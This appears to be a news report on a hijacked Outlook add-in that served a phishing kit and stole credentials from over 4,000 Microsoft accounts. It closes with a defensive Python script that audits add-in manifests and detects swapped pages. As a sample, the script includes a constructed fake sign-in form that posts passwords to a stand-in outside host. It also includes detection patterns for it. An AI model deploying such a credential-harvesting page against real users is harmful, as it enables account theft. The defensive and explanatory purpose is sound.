A hijacked Outlook add-in stole credentials from more than 4,000 Microsoft accounts before being removed from the official Office Store today. Security researchers discovered the first malicious Outlook add-in operating in the wild, exploiting a blind spot in Microsoft's marketplace security.
The AgreeTo add-in originally launched as a legitimate meeting-scheduling tool in December 2022. Developed by an independent publisher, it passed review for Microsoft's Office Add-in Store but was later abandoned by its creator. The listing stayed live on the marketplace even though nobody was maintaining the code or the hosting behind it.
The add-in's approved manifest pointed at a hosting URL on Vercel's platform, and once the project was abandoned that name was no longer under the developer's control. Attackers claimed it and replaced the scheduling tool with a four-page phishing kit: a fake Microsoft sign-in page, a password-collection back end, and an exfiltration script. Because Outlook loads add-in content from the manifest's URL at runtime, the malicious pages rendered directly in Outlook's sidebar whenever a user opened the add-in.
Koi Security researchers gained access to the attacker's exfiltration channel and confirmed more than 4,000 compromised Microsoft accounts. The stolen data included email credentials, credit card numbers, and banking security answers. The kit exfiltrated credentials through the Telegram Bot API, and the campaign remains active, with new victims still being compromised.
Koi Security's analysis also showed the attackers testing stolen credentials against accounts while the campaign was running, rather than merely hoarding them.
The weakness is structural. An Office add-in is essentially a manifest: its code and UI are loaded at runtime from developer-hosted URLs, not from Microsoft's infrastructure. Microsoft reviews and signs the manifest when it approves the listing, but it does not re-check what the referenced URLs actually serve afterwards. Since the hijackers changed the content behind the URL rather than the URL itself, the signed manifest stayed valid and the hijacked add-in ran undetected until researchers found it.
The hijacked version displayed a convincing replica of the Microsoft login page inside Outlook. After a victim entered credentials, it redirected them to the real Microsoft login to reduce suspicion. The phishing kit stayed available in the Office Add-in Store until Microsoft removed it on February 11, 2026.
The add-in also retained the ReadWriteItem permission it had been granted as a scheduling tool, which lets add-in code read and modify the mail item a user currently has open. No such activity was confirmed, but the hijackers inherited that access along with the listing.
"This is the first malware found on Microsoft's official Marketplace and the first malicious Outlook add-in detected in the wild," said Koi Security researcher Oren Yomtov. The incident follows years of warnings that Outlook's add-in architecture is an underexploited attack vector.
Users who installed AgreeTo should remove the add-in immediately, reset their Microsoft account password, sign out of all active sessions, enable multi-factor authentication, and review recent sign-in and mailbox activity; anyone who typed card or banking details into the fake page should also contact their bank. The operator behind the campaign reportedly runs at least a dozen other phishing kits, suggesting broader credential-harvesting infrastructure similar to the phishing surges that have followed major data breaches.
Microsoft had not issued a public statement about the incident at the time of reporting, beyond removing the add-in from its marketplace after the researchers' disclosure. Organizations should inventory every Outlook add-in in their tenant (in Exchange Online PowerShell, Get-App -OrganizationApp lists centrally deployed add-ins and Get-App -Mailbox <user> lists a user's own), confirm that the URLs each manifest points to still belong to the publisher, and restrict self-service installation from the store so that an abandoned listing cannot reach users' mailboxes without review.
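The two checks the architecture paragraph and the audit advice above call for, as an added example that is not Koi Security's, Microsoft's or AgreeTo's code: parse an add-in manifest to list every host it loads content from and the permission it requests, then fingerprint the page served at the SourceLocation so that a swap like the one described (a sign-in form posting to a third-party host) is caught on a later check. The manifest, its ID and URLs, the two HTML pages and the RECLAIMABLE_SUFFIXES list are constructed assumptions for this example; the element and attribute names (SourceLocation, AppDomain, Permissions, DefaultValue, bt:Url) are those of the real Office add-in manifest schema.

```python
# Added example (not Koi Security's or Microsoft's code): audit an Office add-in
# manifest, then fingerprint the page served at its SourceLocation.  All sample
# data (manifest, ID, URLs, HTML pages, RECLAIMABLE_SUFFIXES) is constructed.
import hashlib
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Assumption: shared-hosting suffixes where a released project name can be
# re-registered by a stranger, the takeover pattern described in the article.
RECLAIMABLE_SUFFIXES = (".vercel.app", ".netlify.app", ".herokuapp.com", ".github.io")

SAMPLE_MANIFEST = """<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0" xsi:type="MailApp">
  <Id>00000000-0000-0000-0000-000000000000</Id>
  <ProviderName>Example Publisher</ProviderName>
  <DisplayName DefaultValue="Example Scheduler"/>
  <IconUrl DefaultValue="https://example-scheduler.vercel.app/icon-64.png"/>
  <AppDomains><AppDomain>https://example-scheduler.vercel.app</AppDomain></AppDomains>
  <FormSettings><Form xsi:type="ItemRead"><DesktopSettings>
    <SourceLocation DefaultValue="https://example-scheduler.vercel.app/taskpane.html"/>
  </DesktopSettings></Form></FormSettings>
  <Permissions>ReadWriteItem</Permissions>
  <VersionOverrides xmlns="http://schemas.microsoft.com/office/mailappversionoverrides"
    xsi:type="VersionOverridesV1_0"><Resources><bt:Urls>
    <bt:Url id="Taskpane.Url" DefaultValue="https://example-scheduler.vercel.app/taskpane.html"/>
    <bt:Url id="Commands.Url" DefaultValue="http://cdn.example.net/commands.html"/>
  </bt:Urls></Resources></VersionOverrides>
</OfficeApp>"""

# Constructed page as captured from the SourceLocation while the add-in was healthy.
LEGIT_PAGE = """<html><body><h1>Schedule a meeting</h1>
<form action="/api/slots" method="post"><input name="title"><button>Find times</button></form>
</body></html>"""

# Constructed page modelled on the hijack: a sign-in form posting to a third host.
HIJACKED_PAGE = """<html><body><h1>Sign in to continue</h1>
<form action="https://collector.example.org/submit" method="post">
<input type="email" name="username"><input type="password" name="password">
<button>Next</button></form></body></html>"""

PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I)
FORM_ACTION = re.compile(r"<form[^>]*action\s*=\s*[\"']([^\"'>\s]+)", re.I)

def _local(tag):
    """Strip the XML namespace from an ElementTree tag name."""
    return tag.rpartition("}")[2]

def audit_manifest(xml_text):
    """Return the requested permission, every host the manifest loads from, and findings."""
    root = ET.fromstring(xml_text)
    urls, permission = set(), None
    for el in root.iter():  # walk every element regardless of namespace
        name = _local(el.tag)
        if name == "Permissions":
            permission = (el.text or "").strip()
        elif name == "AppDomain" and el.text:
            urls.add(el.text.strip())
        value = el.attrib.get("DefaultValue", "")
        if value.lower().startswith(("http://", "https://")):
            urls.add(value)  # IconUrl, SourceLocation and bt:Url all use DefaultValue
    hosts = sorted({urlparse(u).hostname for u in urls})
    findings = []
    if permission in ("ReadWriteItem", "ReadWriteMailbox"):
        findings.append(f"{permission}: add-in code can read and modify mail content")
    for h in hosts:
        if h.endswith(RECLAIMABLE_SUFFIXES):
            findings.append(f"{h}: shared hosting name, re-registrable if abandoned")
    for u in sorted(urls):
        if urlparse(u).scheme == "http":
            findings.append(f"{u}: loaded over plaintext HTTP")
    return {"permission": permission, "hosts": hosts, "findings": findings}

def inspect_page(html, expected_host, baseline_sha256=None):
    """Hash the served page and flag credential-harvesting markers in it."""
    digest = hashlib.sha256(html.encode()).hexdigest()
    targets = {urlparse(a).hostname or expected_host for a in FORM_ACTION.findall(html)}
    off_host = sorted(t for t in targets if t != expected_host)  # relative actions stay on-host
    asks = bool(PASSWORD_FIELD.search(html))
    return {"sha256": digest, "asks_for_password": asks,
            "changed_since_baseline": baseline_sha256 is not None and digest != baseline_sha256,
            "off_host_post_targets": off_host, "suspicious": asks or bool(off_host)}

def main():
    report = audit_manifest(SAMPLE_MANIFEST)
    for f in report["findings"]:
        print("finding:", f)
    host = "example-scheduler.vercel.app"
    baseline = inspect_page(LEGIT_PAGE, host)["sha256"]  # record while known-good
    print("later check:", inspect_page(HIJACKED_PAGE, host, baseline))

if __name__ == "__main__":
    main()
```

Run against a real tenant, the manifest text would come from the add-in's listing or the ManifestXml of Get-App output, and the HTML from periodically fetching each SourceLocation; the point of keeping a baseline hash is that a content change at a URL the signed manifest still trusts is exactly what Microsoft's one-time review does not catch.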